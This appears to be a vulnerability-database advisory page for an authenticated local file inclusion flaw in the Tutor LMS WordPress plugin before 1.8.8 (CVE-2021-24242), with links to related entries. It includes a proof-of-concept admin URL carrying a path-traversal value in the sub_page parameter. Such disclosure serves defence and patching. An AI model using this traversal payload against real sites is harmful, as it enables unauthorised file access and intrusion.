Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitSasaWPEX-ID:20F3E63A-31D8-49A0-B4EF-209749FEFF5C
HistoryApr 05, 2021 - 12:00 a.m.

Tutor LMS < 1.8.8 - Authenticated Local File Inclusion

2021-04-0500:00:00
sasa
427
JSON

The plugin is affected by a local file inclusion vulnerability through the maliciously constructed sub_page parameter of the plugin’s Tools, allowing high privilege users to include any local php file

https://your.domain/wp-admin/admin.php?page=tutor-tools&sub_page=..%2F..%2F..%2F..%2F..%2F..%2Findex

Related

osv 1
wpvulndb 1
cve 1
patchstack 1
prion 1
osv
osv
CVE-2021-24242
2021-04-22 21:15:09
wpvulndb
wpvulndb
Tutor LMS < 1.8.8 - Authenticated Local File Inclusion
2021-04-05 00:00:00
cve
cve
CVE-2021-24242
2021-04-22 21:15:00
patchstack
patchstack
WordPress Tutor LMS plugin <= 1.8.7 - Authenticated Local File Inclusion vulnerability
2021-04-05 00:00:00
prion
prion
Arbitrary file deletion
2021-04-22 21:15:00
JSON
Related for WPEX-ID:20F3E63A-31D8-49A0-B4EF-209749FEFF5C
osv1wpvulndb1cve1patchstack1prion1